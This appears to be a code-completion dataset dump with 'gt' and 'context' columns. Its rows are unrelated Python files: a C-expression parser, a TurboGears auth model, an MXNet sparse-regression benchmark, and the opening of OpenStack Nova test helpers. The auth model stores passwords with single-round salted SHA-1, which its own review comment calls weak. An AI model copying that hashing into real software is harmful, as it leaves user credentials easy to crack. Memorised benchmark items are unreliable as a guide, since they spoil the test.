gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
#! /usr/bin/env python3
import sys
import lexer
from tree import Node, CompositeNode
class SymbolDesc:
    """Descriptor of an operator token: its binding priorities and evaluator.

    ``lprio``/``rprio`` are the priorities seen from the left and right side
    of the symbol; ``evaluator`` turns a reduced handle into a tree node.
    """
    def __init__(self, symbol, lprio, rprio, evaluator):
        self.symbol = symbol
        self.lprio = lprio
        self.rprio = rprio
        self.evaluator = evaluator

    def __repr__(self):
        return '<Symbol {} {}/{}>'.format(self.symbol, self.lprio, self.rprio)
def identity_evaluator(args):
    """Reduce a handle holding a single terminal symbol into a leaf Node."""
    if len(args) != 1 or type(args[0]) != SymbolDesc:
        return CompositeNode('ID ERROR', args)
    return Node(args[0].symbol)
def binary_evaluator(args):
    """Build a binary operator node from an <operand, operator, operand> handle."""
    well_formed = (len(args) == 3
                   and type(args[0]) != SymbolDesc
                   and type(args[1]) == SymbolDesc
                   and type(args[2]) != SymbolDesc)
    if not well_formed:
        return CompositeNode('BINARY ERROR', args)
    return CompositeNode(args[1].symbol, [args[0], args[2]])
class Parser:
    """Operator-precedence expression parser.

    Two symbol tables are kept: ``presymbols`` for tokens legal when an
    operand is expected (prefix operators) and ``postsymbols`` for tokens
    legal after an operand (binary/postfix operators, brackets).  Parsing
    maintains a stack mixing already-built tree nodes and SymbolDesc markers;
    whenever the symbol on top of the stack binds more tightly than the
    incoming one, the topmost "handle" is reduced through its evaluator.
    """
    def __init__(self):
        # '$soi$' (start of input) sits at the bottom of the stack with the
        # lowest priorities so no reduction ever pops past it.
        self.presymbols = {}
        self.presymbols['$soi$'] = SymbolDesc('$soi$', 0, 0, None)
        self.postsymbols = {}
        self.postsymbols['$soi$'] = SymbolDesc('$soi$', 0, 0, None)
    def register_presymbol(self, oper, lprio, rprio, evaluator=None):
        """Register one operator (or an iterable of them) for prefix position."""
        if evaluator is None:
            evaluator = unary_evaluator
        if type(oper) is str:
            self.presymbols[oper] = SymbolDesc(oper, lprio, rprio, evaluator)
        else:
            for op in oper:
                self.presymbols[op] = SymbolDesc(op, lprio, rprio, evaluator)
    def register_postsymbol(self, oper, lprio, rprio, evaluator=None):
        """Register one operator (or an iterable of them) for post-operand position."""
        if evaluator is None:
            evaluator = binary_evaluator
        if type(oper) is str:
            self.postsymbols[oper] = SymbolDesc(oper, lprio, rprio, evaluator)
        else:
            for op in oper:
                self.postsymbols[op] = SymbolDesc(op, lprio, rprio, evaluator)
    def advance(self):
        """Load the next token into ``cur_token`` (None at end of input)."""
        try:
            self.cur_token = self.lexer.__next__()
        except StopIteration:
            self.cur_token = None
    def reset(self, s):
        """(Re)initialise lexer, lookahead and parse stack for input ``s``."""
        self.lexer = lexer.tokenize(s)
        self.advance()
        self.stack = [self.presymbols['$soi$']]
    def id_symbol(self, id):
        """Wrap a terminal (identifier/number token) in a maximal-priority symbol."""
        return SymbolDesc(id, 999, 1000, identity_evaluator)
    def evaluate_handle(self, args):
        """Reduce a handle by delegating to the first SymbolDesc's evaluator."""
        for i in args:
            if type(i) == SymbolDesc:
                return i.evaluator(args)
        raise RuntimeError('Internal error: no evaluator found in {}'.format(args))
    def evaluate(self):
        """Pop the topmost handle off the stack and push its reduction."""
        idx = len(self.stack)-1
        if type(self.stack[idx]) != SymbolDesc:
            idx -= 1
        curprio = self.stack[idx].lprio
        # Extend the handle leftwards over operands and over symbols whose
        # right priority matches (this groups e.g. both halves of '? :').
        while type(self.stack[idx-1]) != SymbolDesc or self.stack[idx-1].rprio == curprio:
            idx -= 1
            if type(self.stack[idx]) == SymbolDesc:
                curprio = self.stack[idx].lprio
        args = self.stack[idx:]
        self.stack[idx:] = []
        self.stack.append(self.evaluate_handle(args))
    def tos_symbol(self):
        """Return the topmost SymbolDesc on the stack, skipping tree nodes."""
        idx = len(self.stack)-1
        while type(self.stack[idx]) != SymbolDesc:
            idx -= 1
        return self.stack[idx]
    def cur_sym(self, allow_presymbol):
        """Map the lookahead token to a SymbolDesc, or None if unusable here."""
        if self.cur_token is None:
            return None
        elif self.cur_token.kind == 'ID':
            return self.id_symbol(self.cur_token)
        elif self.cur_token.kind == 'NUMBER':
            return self.id_symbol(self.cur_token)
        elif allow_presymbol and self.cur_token.lexem in self.presymbols:
            return self.presymbols[self.cur_token.lexem]
        elif self.cur_token.lexem in self.postsymbols:
            return self.postsymbols[self.cur_token.lexem]
        else:
            return None
    def parse(self, s):
        """Parse ``s`` and return its tree (None for empty input).

        Any unconsumed input is wrapped in a 'REMAINING INPUT' node.
        """
        self.reset(s)
        while True:
            # A prefix symbol is only legal when the stack top is a symbol,
            # i.e. when an operand is expected.
            sym = self.cur_sym(type(self.stack[-1]) == SymbolDesc)
            if sym is None:
                break
            while self.tos_symbol().rprio > sym.lprio:
                self.evaluate()
                sym = self.cur_sym(False)
            self.stack.append(sym)
            self.advance()
        # Reduce what is left down to ['$soi$', tree].
        while len(self.stack) > 2 or (len(self.stack) == 2 and type(self.stack[-1]) == SymbolDesc):
            self.evaluate()
        if len(self.stack) == 1:
            res = None
        elif len(self.stack) == 2:
            res = self.stack[1]
        if self.cur_token is not None:
            res = CompositeNode('REMAINING INPUT', [res, self.cur_token])
        return res
def open_parenthesis_evaluator(args):
    """Reduce a handle opened by '(': plain grouping or a function call."""
    # '(' expr ')'  ->  grouping: yields the inner expression unchanged.
    if (len(args) == 3
            and type(args[0]) == SymbolDesc and args[0].symbol == '('
            and type(args[1]) != SymbolDesc
            and type(args[2]) == SymbolDesc and args[2].symbol == ')'):
        return args[1]
    # f '(' ')'  ->  call with no arguments.
    elif (len(args) == 3
            and type(args[0]) != SymbolDesc
            and type(args[1]) == SymbolDesc and args[1].symbol == '('
            and type(args[2]) == SymbolDesc and args[2].symbol == ')'):
        return CompositeNode('call', [args[0]])
    # f '(' exprs ')'  ->  call; a ',' node carries several arguments.
    elif (len(args) == 4
            and type(args[0]) != SymbolDesc
            and type(args[1]) == SymbolDesc and args[1].symbol == '('
            and type(args[2]) != SymbolDesc
            and type(args[3]) == SymbolDesc and args[3].symbol == ')'):
        # NOTE(review): assumes CompositeNode exposes its operator as ``token``
        # (while SymbolDesc uses ``symbol``) -- confirm against tree.py.
        if args[2].token == ',':
            callargs = args[2].children
        else:
            callargs = [args[2]]
        callargs.insert(0, args[0])
        return CompositeNode('call', callargs)
    else:
        return CompositeNode('( ERROR', args)
def close_parenthesis_evaluator(args):
    """A ')' is always consumed by the '(' handle; reducing on it is an error."""
    return CompositeNode(') ERROR', args)
def open_bracket_evaluator(args):
    """Build an indexing node from an <object, '[', index, ']'> handle."""
    is_index = (len(args) == 4
                and type(args[0]) != SymbolDesc
                and type(args[1]) == SymbolDesc and args[1].symbol == '['
                and type(args[2]) != SymbolDesc
                and type(args[3]) == SymbolDesc and args[3].symbol == ']')
    if not is_index:
        return CompositeNode('[ ERROR', args)
    return CompositeNode('get', [args[0], args[2]])
def close_bracket_evaluator(args):
    """A ']' is always consumed by the '[' handle; reducing on it is an error."""
    return CompositeNode('] ERROR', args)
def coma_evaluator(args):
    """Collapse a comma-separated handle into one ',' node of its operands."""
    operands = []
    for item in args:
        if type(item) != SymbolDesc:
            operands.append(item)
    return CompositeNode(',', operands)
def unary_evaluator(args):
    """Build a prefix or postfix unary node from a two-element handle."""
    if len(args) != 2:
        return CompositeNode('UNARY ERROR', args)
    first_is_op = type(args[0]) == SymbolDesc
    second_is_op = type(args[1]) == SymbolDesc
    if first_is_op and not second_is_op:
        # prefix: operator before operand
        return CompositeNode(args[0].symbol, [args[1]])
    if second_is_op and not first_is_op:
        # postfix: marked with a 'post' prefix to keep it distinct
        return CompositeNode('post'+args[1].symbol, [args[0]])
    return CompositeNode('UNARY ERROR', args)
def unary_or_binary_evaluator(args):
    """Dispatch a handle to prefix-unary, postfix-unary or binary form."""
    # Encode which positions hold operator symbols; the pattern identifies
    # the arity and fixity of the handle.
    shape = tuple(type(a) == SymbolDesc for a in args)
    if shape == (True, False):
        return CompositeNode(args[0].symbol, [args[1]])
    if shape == (False, True):
        return CompositeNode('post'+args[1].symbol, [args[0]])
    if shape == (False, True, False):
        return CompositeNode(args[1].symbol, [args[0], args[2]])
    return CompositeNode('1,2-ARY ERROR', args)
def question_evaluator(args):
    """Build a ternary '?' node from an <a, '?', b, ':', c> handle."""
    well_formed = (len(args) == 5
                   and type(args[0]) != SymbolDesc
                   and type(args[1]) == SymbolDesc and args[1].symbol == '?'
                   and type(args[2]) != SymbolDesc
                   and type(args[3]) == SymbolDesc and args[3].symbol == ':'
                   and type(args[4]) != SymbolDesc)
    if not well_formed:
        return CompositeNode('? ERROR', args)
    return CompositeNode('?', [args[0], args[2], args[4]])
def colon_evaluator(args):
    """A ':' is always consumed by the '?' handle; reducing on it is an error."""
    return CompositeNode(': ERROR', args)
def cexp_parser():
    """Build a Parser loaded with the C expression operators.

    Priority pairs (lprio, rprio) encode both precedence and associativity:
    lprio < rprio gives left associativity, lprio > rprio right associativity.
    """
    parser = Parser()
    parser.register_postsymbol(',', 2, 2, coma_evaluator)
    # Assignment operators are right associative (lprio > rprio).
    parser.register_postsymbol(['=', '*=', '/=', '%=', '+=', '-=', '<<=', '>>=', '&=', '|=', '^='], 5, 4)
    # '?' and ':' cooperate through matched priorities to form the ternary.
    parser.register_postsymbol('?', 7, 1, question_evaluator)
    parser.register_postsymbol(':', 1, 6, colon_evaluator)
    parser.register_postsymbol('||', 8, 9)
    parser.register_postsymbol('&&', 10, 11)
    parser.register_postsymbol('|', 12, 13)
    parser.register_postsymbol('^', 14, 15)
    parser.register_postsymbol('&', 16, 17)
    parser.register_postsymbol(['==', '!='], 18, 19)
    parser.register_postsymbol(['<', '>', '<=', '>='], 20, 21)
    parser.register_postsymbol(['<<', '>>'], 22, 23)
    parser.register_postsymbol(['+', '-'], 24, 25)
    parser.register_postsymbol(['/', '%', '*'], 26, 27)
    # Exponentiation is right associative.
    parser.register_postsymbol('**', 29, 28)
    parser.register_presymbol(['+', '-', '++', '--', '~', '!', '&', '*'], 31, 30, unary_evaluator)
    parser.register_postsymbol(['++', '--'], 32, 33, unary_evaluator)
    parser.register_postsymbol(['.', '->'], 32, 33)
    # Brackets: bind tightly from the outside, loosely on the inside so the
    # whole bracketed expression reduces before the bracket pair does.
    parser.register_postsymbol('(', 100, 1, open_parenthesis_evaluator)
    parser.register_postsymbol(')', 1, 100, close_parenthesis_evaluator)
    parser.register_postsymbol('[', 100, 1, open_bracket_evaluator)
    parser.register_postsymbol(']', 1, 100, close_bracket_evaluator)
    return parser
def main(args):
    """Parse each command-line argument as a C expression and print its tree."""
    expr_parser = cexp_parser()
    for source in args[1:]:
        try:
            tree = expr_parser.parse(source)
        except RuntimeError as run_error:
            print('Unable to parse {}: {}'.format(source, run_error))
        else:
            print('{} -> {}'.format(source, tree))


if __name__ == "__main__":
    main(sys.argv)
| |
# -*- coding: utf-8 -*-
"""
Auth* related model.
This is where the models used by :mod:`repoze.who` and :mod:`repoze.what` are
defined.
It's perfectly fine to re-use this definition in the Brie application,
though.
"""
import os
from datetime import datetime
import sys
try:
from hashlib import sha1
except ImportError:
sys.exit('ImportError: No module named hashlib\n'
'If you are on python2.4 this library is not part of python. '
'Please install it. Example: easy_install hashlib')
from sqlalchemy import Table, ForeignKey, Column
from sqlalchemy.types import Unicode, Integer, DateTime
from sqlalchemy.orm import relation, synonym
from brie.model import DeclarativeBase, metadata, DBSession
__all__ = ['User', 'Group', 'Permission']
#{ Association tables
# This is the association table for the many-to-many relationship between
# groups and permissions. This is required by repoze.what.
# Many-to-many: which permissions each group grants (required by repoze.what).
group_permission_table = Table('tg_group_permission', metadata,
    Column('group_id', Integer, ForeignKey('tg_group.group_id',
        onupdate="CASCADE", ondelete="CASCADE")),
    Column('permission_id', Integer, ForeignKey('tg_permission.permission_id',
        onupdate="CASCADE", ondelete="CASCADE"))
)
# This is the association table for the many-to-many relationship between
# groups and members - this is, the memberships. It's required by repoze.what.
user_group_table = Table('tg_user_group', metadata,
    Column('user_id', Integer, ForeignKey('tg_user.user_id',
        onupdate="CASCADE", ondelete="CASCADE")),
    Column('group_id', Integer, ForeignKey('tg_group.group_id',
        onupdate="CASCADE", ondelete="CASCADE"))
)
#{ The auth* model itself
class Group(DeclarativeBase):
    """
    Group definition for :mod:`repoze.what`.
    Only the ``group_name`` column is required by :mod:`repoze.what`.
    """
    __tablename__ = 'tg_group'
    #{ Columns
    group_id = Column(Integer, autoincrement=True, primary_key=True)
    group_name = Column(Unicode(16), unique=True, nullable=False)
    display_name = Column(Unicode(255))
    created = Column(DateTime, default=datetime.now)
    #{ Relations
    # Members of this group; the backref provides User.groups.
    users = relation('User', secondary=user_group_table, backref='groups')
    #{ Special methods
    def __repr__(self):
        return '<Group: name=%s>' % self.group_name
    def __unicode__(self):
        return self.group_name
    #}
#}
# The 'info' argument we're passing to the email_address and password columns
# contain metadata that Rum (http://python-rum.org/) can use generate an
# admin interface for your models.
class User(DeclarativeBase):
    """
    User definition.
    This is the user definition used by :mod:`repoze.who`, which requires at
    least the ``user_name`` column.
    """
    __tablename__ = 'tg_user'
    #{ Columns
    user_id = Column(Integer, autoincrement=True, primary_key=True)
    user_name = Column(Unicode(16), unique=True, nullable=False)
    email_address = Column(Unicode(255), unique=True, nullable=False,
                           info={'rum': {'field':'Email'}})
    display_name = Column(Unicode(255))
    # Stored as 40 hex chars of salt followed by 40 hex chars of
    # sha1(password + salt); see _set_password/validate_password.
    _password = Column('password', Unicode(80),
                       info={'rum': {'field':'Password'}})
    created = Column(DateTime, default=datetime.now)
    #{ Special methods
    def __repr__(self):
        return '<User: email="%s", display name="%s">' % (
                self.email_address, self.display_name)
    def __unicode__(self):
        return self.display_name or self.user_name
    #{ Getters and setters
    @property
    def permissions(self):
        """Return a set of strings for the permissions granted."""
        perms = set()
        for g in self.groups:
            perms = perms | set(g.permissions)
        return perms
    @classmethod
    def by_email_address(cls, email):
        """Return the user object whose email address is ``email``."""
        return DBSession.query(cls).filter(cls.email_address==email).first()
    @classmethod
    def by_user_name(cls, username):
        """Return the user object whose user name is ``username``."""
        return DBSession.query(cls).filter(cls.user_name==username).first()
    def _set_password(self, password):
        """Hash ``password`` on the fly and store its hashed version."""
        # NOTE(review): Python 2 only -- ``unicode`` does not exist on Python 3.
        # NOTE(review): single-round SHA-1 is weak by modern standards; a KDF
        # (bcrypt/PBKDF2) would be preferable if this model is modernised.
        hashed_password = password
        if isinstance(password, unicode):
            password_8bit = password.encode('UTF-8')
        else:
            password_8bit = password
        salt = sha1()
        salt.update(os.urandom(60))
        hash = sha1()
        hash.update(password_8bit + salt.hexdigest())
        hashed_password = salt.hexdigest() + hash.hexdigest()
        # Make sure the hashed password is an UTF-8 object at the end of the
        # process because SQLAlchemy _wants_ a unicode object for Unicode
        # columns
        if not isinstance(hashed_password, unicode):
            hashed_password = hashed_password.decode('UTF-8')
        self._password = hashed_password
    def _get_password(self):
        """Return the hashed version of the password."""
        return self._password
    # Assigning ``user.password = ...`` hashes transparently; reading it
    # returns the stored salt+hash string.
    password = synonym('_password', descriptor=property(_get_password,
                                                        _set_password))
    #}
    def validate_password(self, password):
        """
        Check the password against existing credentials.
        :param password: the password that was provided by the user to
            try and authenticate. This is the clear text version that we will
            need to match against the hashed one in the database.
        :type password: unicode object.
        :return: Whether the password is valid.
        :rtype: bool
        """
        # First 40 chars of the stored value are the salt, the rest the hash.
        hashed_pass = sha1()
        hashed_pass.update(password + self.password[:40])
        return self.password[40:] == hashed_pass.hexdigest()
class Permission(DeclarativeBase):
    """
    Permission definition for :mod:`repoze.what`.
    Only the ``permission_name`` column is required by :mod:`repoze.what`.
    """
    __tablename__ = 'tg_permission'
    #{ Columns
    permission_id = Column(Integer, autoincrement=True, primary_key=True)
    permission_name = Column(Unicode(16), unique=True, nullable=False)
    description = Column(Unicode(255))
    #{ Relations
    # Groups granting this permission; the backref provides Group.permissions.
    groups = relation(Group, secondary=group_permission_table,
                      backref='permissions')
    #{ Special methods
    def __repr__(self):
        return '<Permission: name=%s>' % self.permission_name
    def __unicode__(self):
        return self.permission_name
    #}
#}
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import argparse
import os
import multiprocessing
from mxnet.test_utils import *
MAX_NUM_BATCH = 99999999  # sentinel for --num-batch meaning "no limit"
# Names of the --measure-only modes.
COMP = "compute"
COMM = "communication"
IO = "io"
# Command-line interface of the sparse linear-regression benchmark.
parser = argparse.ArgumentParser(description="Run sparse linear regression " \
                                 "with distributed kvstore",
                                 formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--profiler', type=int, default=0,
                    help='whether to use profiler')
parser.add_argument('--num-epoch', type=int, default=1,
                    help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=512,
                    help='number of examples per batch')
parser.add_argument('--num-batch', type=int, default=MAX_NUM_BATCH,
                    help='number of batches per epoch')
parser.add_argument('--dummy-iter', type=int, default=0,
                    help='whether to use dummy iterator to exclude io cost')
parser.add_argument('--kvstore', type=str, default=None,
                    help='what kvstore to use [local, dist_sync, etc]')
parser.add_argument('--sparse-log-level', type=str, default='DEBUG',
                    help='logging level [DEBUG, INFO, ERROR]')
parser.add_argument('--dataset', type=str, default='avazu',
                    help='what test dataset to use')
parser.add_argument('--num-gpu', type=int, default=0,
                    help='number of gpus to use. 0 means using cpu(0);'
                         'otherwise, use gpu(0),...,gpu(num_gpu-1)')
parser.add_argument('--output-dim', type=int, default=4,
                    help='number of columns of the forward output')
parser.add_argument('--dummy-metric', type=int, default=0,
                    help='whether to call update_metric')
parser.add_argument('--enable-logging-for', default="0",
                    help="Enable logging for the specified list of workers")
parser.add_argument('--measure-only', default=None,
                    help="Measure only",
                    choices=[IO, COMP, COMM])
parser.add_argument('--omit-row-sparse-push', action='store_true',
                    help="omit row_sparse_push")
class DummyIter(mx.io.DataIter):
    "A dummy iterator that always return the same batch, used for speed testing"
    def __init__(self, real_iter):
        super(DummyIter, self).__init__()
        self.real_iter = real_iter
        # Mirror the wrapped iterator's interface so Module.bind() still works.
        self.provide_data = real_iter.provide_data
        self.provide_label = real_iter.provide_label
        self.batch_size = real_iter.batch_size
        # Capture the first real batch once; next() replays it forever.
        for batch in real_iter:
            self.the_batch = batch
            break
    def __iter__(self):
        return self
    def next(self):
        # Never raises StopIteration; callers bound iteration by batch count.
        return self.the_batch
# testing dataset sources
# Each entry describes one libsvm benchmark file: local name, compressed
# origin name, download url, feature dimensionality and line count ('lc').
avazu = {
    'data_name': 'avazu-app.t',
    'data_origin_name': 'avazu-app.t.bz2',
    'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/avazu-app.t.bz2",
    'feature_dim': 1000001,
    'lc': 1719304,
}
kdda = {
    'data_name': 'kdda.t',
    'data_origin_name': 'kdda.t.bz2',
    'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/kdda.t.bz2",
    'feature_dim': 20216831,
    'lc': 510302,
}
criteo = {
    'data_name': 'criteo.t',
    'data_origin_name': 'criteo.t.bz2',
    'url': "https://s3-us-west-2.amazonaws.com/sparse-dataset/criteo.t.bz2",
    'feature_dim': 8388621,
    'lc': 548787,
}
datasets = { 'kdda' : kdda, 'avazu' : avazu , 'criteo': criteo }
def get_sym(feature_dim):
    """Build the sparse linear model: softmax(csr_data . row_sparse_weights).

    NOTE(review): reads the module-level ``args`` (parsed in __main__) for
    ``output_dim``, so it is only callable after argument parsing.
    """
    inputs = mx.symbol.Variable("data", stype='csr')
    norm_init = mx.initializer.Normal(sigma=0.01)
    weights = mx.symbol.Variable("w", shape=(feature_dim, args.output_dim),
                                 init=norm_init, stype='row_sparse')
    embed = mx.symbol.sparse.dot(inputs, weights)
    softmax_output = mx.symbol.Variable("softmax_label")
    model = mx.symbol.SoftmaxOutput(data=embed, label=softmax_output, name="out")
    return model
def row_sparse_push(kv, param_arrays, grad_arrays, param_names):
    """Push each parameter's gradient list to the kvstore.

    Parameters whose gradient is absent (first entry None) are skipped.
    Higher-index parameters get lower push priority, matching pull order.
    """
    for index, (arg_list, grad_list) in enumerate(zip(param_arrays, grad_arrays)):
        if grad_list[0] is None:
            continue
        kv.push(param_names[index], grad_list, priority=-index)
def row_sparse_pull(kv, key, data, slices, weight_array, priority):
    """Pull only the weight rows touched by the csr batch into each context."""
    # if have kvstore, need to pull corresponding rows of
    # the weights to each context
    # column indices (NDArray type) of the csr data
    # used as the row_idx of the weight row-sparse matrix
    row_indices = data.indices
    if len(slices) == 1:
        kv.row_sparse_pull(key, weight_array, priority=priority, row_ids=row_indices)
    else:  # more than one slices, multi-GPU training. Need to retain weight rows according to data slices
        # TODO(junwu):
        # the following line blocks, may need to pre-compute
        # and cache it outside the for loop
        indptr = data.indptr.asnumpy()
        row_idx_array = []
        for s in slices:
            # column indices of the csr rows in slice [s.start, s.stop)
            row_idx_array.append(row_indices[indptr[s.start]:indptr[s.stop]])
        kv.row_sparse_pull(key, weight_array, priority=priority, row_ids=row_idx_array)
if __name__ == '__main__':
    # ---- argument parsing and derived configuration ----
    args = parser.parse_args()
    num_epoch = args.num_epoch
    num_batch = args.num_batch
    kvstore = args.kvstore
    profiler = args.profiler > 0
    batch_size = args.batch_size if args.num_gpu == 0 else args.num_gpu * args.batch_size
    dummy_iter = args.dummy_iter
    dataset = args.dataset
    log_level = args.sparse_log_level
    measure_only = args.measure_only
    num_cores = multiprocessing.cpu_count()
    omit_row_sparse_push = args.omit_row_sparse_push
    if measure_only == COMP or measure_only == IO:
        assert not kvstore, "when compute_only or io_only is set, kvstore should be None"
        # NOTE(review): '/' is true division on Python 3, leaving num_batch a
        # float; '//' looks intended (non-integral num_batch never equals the
        # integer nbatch counter below).
        num_batch = datasets[dataset]['lc'] / batch_size if num_batch == MAX_NUM_BATCH else num_batch
    if measure_only == COMM:
        assert (kvstore == "dist_async"), "when communication_only is set kvstore should be dist_async"
        # NOTE(review): same true-division concern as above.
        num_batch = datasets[dataset]['lc'] / batch_size if num_batch == MAX_NUM_BATCH else num_batch
    contexts = mx.context.cpu(0) if args.num_gpu < 1\
               else [mx.context.gpu(i) for i in range(args.num_gpu)]
    # create kvstore when there are gpus
    kv = mx.kvstore.create(kvstore) if kvstore else None
    rank = kv.rank if kv is not None else 0
    num_worker = kv.num_workers if kv is not None else 1
    # only print log for rank 0 worker
    import logging
    if log_level == 'ERROR':
        log_level = logging.ERROR
    elif log_level == 'DEBUG':
        log_level = logging.DEBUG
    else:
        log_level = logging.INFO
    # Only log if it is in the list of workers to be logged
    logging_workers_list = [int(i) for i in args.enable_logging_for.split(",")]
    log_level = log_level if rank in logging_workers_list else logging.CRITICAL
    head = '%(asctime)-15s %(message)s'
    logging.basicConfig(level=log_level, format=head)
    # dataset selection and (if needed) download
    assert(dataset in datasets), "unknown dataset " + dataset
    metadata = datasets[dataset]
    feature_dim = metadata['feature_dim']
    # NOTE(review): 'if logging:' tests the module object and is always true.
    if logging:
        logging.debug('preparing data ... ')
    data_dir = os.path.join(os.getcwd(), 'data')
    path = os.path.join(data_dir, metadata['data_name'])
    if not os.path.exists(path):
        get_bz2_data(data_dir, metadata['data_name'], metadata['url'],
                     metadata['data_origin_name'])
    assert os.path.exists(path)
    # data iterator: each worker reads its own shard of the libsvm file
    train_data = mx.io.LibSVMIter(data_libsvm=path, data_shape=(feature_dim,),
                                  batch_size=batch_size, num_parts=num_worker,
                                  part_index=rank)
    if dummy_iter or measure_only == COMP or measure_only == COMM:
        train_data = DummyIter(train_data)
    # model
    model = get_sym(feature_dim)
    # module
    mod = mx.mod.Module(symbol=model, data_names=['data'],
                        label_names=['softmax_label'], context=contexts)
    mod.bind(data_shapes=train_data.provide_data, label_shapes=train_data.provide_label)
    mod.init_params(initializer=mx.init.Uniform(scale=.1))
    sgd = mx.optimizer.SGD(momentum=0.0, clip_gradient=5.0,
                           learning_rate=0.1, rescale_grad=1.0/batch_size/num_worker)
    mod.init_optimizer(optimizer=sgd, kvstore=kv)
    # use accuracy as the metric
    metric = mx.metric.create('acc')
    index = mod._exec_group.param_names.index('w')
    # weight_array bound to executors of the contexts
    weight_array = mod._exec_group.param_arrays[index]
    mx.nd.waitall()  # sync point for initialization
    # start profiler
    if profiler:
        device = 'cpu'
        if args.num_gpu > 0:
            device = 'gpu' + str(args.num_gpu)
        name = 'profile_' + args.dataset + '_' + device + '_nworker' + str(num_worker)\
               + '_batchsize' + str(args.batch_size) + '_outdim' + str(args.output_dim) + '.json'
        mx.profiler.set_config(profile_all=True, filename=name)
        mx.profiler.set_state('run')
    logging.debug('start training ...')
    start = time.time()
    data_iter = iter(train_data)
    time_cost_epoch = 0.
    sum_cost_epoch = 0.
    average_cost_epoch = 0.
    for epoch in range(num_epoch):
        start_time_epoch = time.time()
        nbatch = 0
        end_of_batch = False
        metric.reset()
        next_batch = next(data_iter)
        # Prefetch the sparse weight rows needed by the first batch.
        if kv is not None:
            row_sparse_pull(kv, 'w', next_batch.data[0], mod._exec_group.slices, weight_array, -index)
        while not end_of_batch:
            nbatch += 1
            batch = next_batch
            if measure_only != IO and measure_only != COMM:
                mod.forward_backward(batch)
                # update parameters
                mod.update()
            if measure_only == COMM:
                # One real step first so gradients exist; afterwards only the
                # push traffic is exercised.
                if nbatch == 1:
                    mod.forward_backward(batch)
                    mod.update()
                elif not omit_row_sparse_push:
                    row_sparse_push(kv, mod._exec_group.param_arrays, mod._exec_group.grad_arrays, mod._exec_group.param_names)
            try:
                # pre fetch next batch
                next_batch = next(data_iter)
                if nbatch == num_batch:
                    raise StopIteration
                if kv is not None:
                    row_sparse_pull(kv, 'w', next_batch.data[0], mod._exec_group.slices, weight_array, -index)
            except StopIteration:
                end_of_batch = True
            # accumulate prediction accuracy
            if args.dummy_metric == 0:
                mod.update_metric(metric, batch.label)
            else:  # call waitall to replace update_metric as sync point
                mx.nd.waitall()  # sync point for the current minibatch
        logging.info('epoch {}, {}'.format(epoch, metric.get()))
        end_time_epoch = time.time()
        if epoch == 0:
            logging.debug("num_batches = {}".format(nbatch))
            logging.info('|device|num_worker|average_cost_epoch|rank|')
        time_cost_epoch = end_time_epoch - start_time_epoch
        # The first epoch is excluded from the running average (warm-up).
        if epoch > 0:
            sum_cost_epoch = sum_cost_epoch + time_cost_epoch
            average_cost_epoch = float(sum_cost_epoch) / epoch
        logging.info('num_worker = {}, time cost per epoch = {}'.format(str(num_worker), str(time_cost_epoch)))
        if args.num_gpu < 1:
            logging.info('|cpu/{} cores| {} | {} | {} |'.format(str(num_cores), str(num_worker), str(average_cost_epoch), rank))
        data_iter.reset()
    if profiler:
        mx.profiler.set_state('stop')
    end = time.time()
    time_cost = end - start
    logging.info('num_worker = {}, rank = {}, time cost = {}'.format(str(num_worker), str(rank), str(time_cost)))
| |
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import platform
import socket
import sys
from oslo.config import cfg
from nova.compute import flavors
import nova.context
import nova.db
from nova import exception
from nova.image import glance
from nova.network import minidns
from nova.network import model as network_model
from nova.objects import instance as instance_obj
CONF = cfg.CONF
CONF.import_opt('use_ipv6', 'nova.netconf')
def get_test_admin_context():
    """Return an admin RequestContext for use in tests."""
    return nova.context.get_admin_context()
def get_test_image_info(context, instance_ref):
    """Return the glance metadata dict for an instance's image_ref."""
    if not context:
        context = get_test_admin_context()
    image_service, image_id = glance.get_remote_image_service(
        context, instance_ref['image_ref'])
    return image_service.show(context, image_id)
def get_test_flavor(context=None, options=None):
    """Create (or fetch, if it already exists) the 'kinda.big' test flavor.

    ``options`` entries override the defaults before creation.
    """
    if not context:
        context = get_test_admin_context()
    test_flavor = {'name': 'kinda.big',
                   'flavorid': 'someid',
                   'memory_mb': 2048,
                   'vcpus': 4,
                   'root_gb': 40,
                   'ephemeral_gb': 80,
                   'swap': 1024}
    test_flavor.update(options or {})
    try:
        return nova.db.flavor_create(context, test_flavor)
    except (exception.FlavorExists, exception.FlavorIdExists):
        # Another test already created it; reuse the stored record.
        return nova.db.flavor_get_by_name(context, 'kinda.big')
def get_test_instance(context=None, flavor=None, obj=False):
    """Create and return a test instance.

    :param context: request context; an admin context is created if omitted.
    :param flavor: flavor record; the default test flavor is used if omitted.
    :param obj: when True return an Instance object, otherwise a DB record.
    """
    if not context:
        context = get_test_admin_context()
    if not flavor:
        flavor = get_test_flavor(context)
    metadata = {}
    flavors.save_flavor_info(metadata, flavor, '')
    # BUG FIX: 'project_id' appeared twice in this literal ('fake' then
    # context.project_id); the first entry was dead, so it is dropped.
    test_instance = {'memory_kb': '2048000',
                     'basepath': '/some/path',
                     'bridge_name': 'br100',
                     'vcpus': 4,
                     'root_gb': 40,
                     'bridge': 'br101',
                     'image_ref': 'cedef40a-ed67-4d10-800e-17455edce175',
                     'instance_type_id': '5',
                     'system_metadata': metadata,
                     'extra_specs': {},
                     'user_id': context.user_id,
                     'project_id': context.project_id,
                     }
